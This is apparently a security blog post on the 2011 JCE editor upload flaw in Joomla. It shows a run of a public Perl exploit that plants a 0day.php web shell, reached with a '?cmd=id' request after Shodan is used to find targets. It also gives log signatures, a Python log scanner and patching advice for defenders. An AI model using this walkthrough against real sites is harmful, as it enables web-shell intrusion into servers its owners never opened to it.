Maybe everyone knows this attack because it was discovered in August 2011. I think it's very interesting because each day there are more and more IPS/IDS alerts.

If we take a look at the zone-h.org website, we can see that guys like Hmei7 are hacking Joomla websites through a JCE Editor vulnerability every day, every minute...


It's possible that one day, when you go to your Joomla Website, you will see something like this:



How can we take advantage of the JCE Editor Weakness?


If you are using Joomla with JCE 2.0.10 (prior versions may also be affected), your website is at risk.

AmnPardaz Security Research & Penetration Testing Group published two exploit scripts, in PHP and Perl, after a vendor-supplied patch for the JCE vulnerability was released.

You can get those exploit scripts here.
 
Now, we are going to hack our own website... ;)

First of all, we need to locate a Joomla installation on Shodan: http://www.shodanhq.com/search?q=joomla

Then, we run the Perl exploit on our Linux machine:
behindthefirewalls.blogspot.com@Hacking:~$ perl jce.pl xxx.com


    .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.

    ||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||


[*] Checking Exploitability ...

[*] Trying to upload 0day.gif ...

[*] Trying to change extension from .gif to .php ...

[+] 0day.php was successfully uploaded

[+] Path:xxx.com/images/stories/0day.php?cmd=id

Finally, if you get the Path, you can check if the server has been hacked. If you visit...
http://xxx.com/images/stories/0day.php?cmd=id

You will see...


In this case, we have modified the script to print our name on the web server.
If you are a security engineer, you should check the web server logs for something like:
POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1
Head //images/stories/0day.php HTTP/1.1
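
A small scanner for the two requests above, added here as an example (it is not from the original post or from the exploit's authors). It assumes the Apache/nginx "combined" access log format; the sample log lines, dates and IP addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Combined log format: ip - - [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Script files have no business in Joomla's media upload directory.
SCRIPT_IN_MEDIA = re.compile(r'/images/stories/.*\.(?:php\d?|phtml)$', re.I)

SAMPLE_LOG = [  # constructed sample lines, documentation-range IP addresses
    '198.51.100.7 - - [12/Mar/2013:10:01:02 +0000] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [12/Mar/2013:10:01:04 +0000] "HEAD //images/stories/0day.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - [12/Mar/2013:10:05:00 +0000] "GET /images/stories/logo.gif HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.44 - - [12/Mar/2013:11:30:00 +0000] "GET /images/stories/0day.php?cmd=id HTTP/1.1" 200 64 "-" "-"',
]

def classify(method, target):
    """Return 'jce_post', 'media_script' or None for one request."""
    # Split by hand: urlsplit() would read the leading '//' as a host name.
    path, _, qs = target.partition('?')
    path = re.sub(r'/+', '/', path)  # collapse the doubled slash
    query = parse_qs(qs)
    if (method.upper() == 'POST' and path.endswith('/index.php')
            and query.get('option') == ['com_jce']
            and query.get('plugin') == ['imgmanager']):
        return 'jce_post'
    if SCRIPT_IN_MEDIA.search(path):
        return 'media_script'
    return None

def scan(lines):
    """Group suspicious requests by client IP; both kinds from one IP is 'high'."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        kind = classify(method, target)
        if kind:
            hits[ip].append((kind, when, target, int(status)))
    report = {}
    for ip, events in hits.items():
        both = {e[0] for e in events} == {'jce_post', 'media_script'}
        report[ip] = {'severity': 'high' if both else 'review', 'events': events}
    return report

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))
```

A 200 status on a script under images/stories means the file exists on disk, so the site should be treated as compromised even if the uploading POST has already rotated out of the logs.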
If you have a Snort IDS, you will see the following Snort events...





In the last few days, many clients have been calling me asking about these attacks. The response is: recover a backup of your site and upgrade to the JCE 2.0.11 release.

Also, you can exploit this vulnerability with Metasploit.



You can learn how to fix this vulnerability here.

If you want to know who Hmei7 is, visit this website.

Great explanation by Josh Pate here.